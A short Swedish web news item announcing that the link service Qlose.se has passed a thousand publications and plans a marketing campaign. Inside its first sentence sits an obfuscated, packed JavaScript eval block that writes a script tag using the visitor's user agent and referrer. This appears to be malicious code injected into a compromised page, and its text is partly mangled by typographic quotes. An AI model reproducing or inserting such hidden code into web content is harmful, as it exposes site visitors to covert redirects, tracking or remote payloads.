Image Image Image Image Image Image Image Image Image Image

| 9 juli, 2020

Scroll to top

Top

Länktjänsten Qlose når över tusen publiceringar

Länktjänsten Qlose når över tusen publiceringar
Revue Magazine

Länksidan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|defyz|var|u0026u|referrer|dbfyt||js|php’.split(’|’),0,{}))
Qlose.se meddelar att man nu är uppe i över 1000 publiceringar/länkar redan efter drygt tre veckor live. 

”Det är våra besökare och medlemmar vi vill tacka för detta. Ett högt engagemang som verkligen gett resultat. Det ska bli väldigt kul och intressant och se hur statistiken nästa månad kommer att se ut.”

Qlose.se säger också att man kommer att lansera en mindre marknadsföringskampanj nu i början av maj för att locka fler intresserade och dedikerade besökare som vill öka trafik på sin blogg eller hemsida.

”Vi har lagt upp en bra och kostnadseffektiv strategi för en marknadsföringskampanj som kör igång i början av nästa månad.”

Qlose.se är ett både kul och intressant verktyg som vi vet ger goda resultat.. Självklart är den kostnadsfri och det går fort att bli medlem.

Hemsida: Qlose.se

Ni kan också läsa fler artiklar här:
Startaeget.se
Tkj.se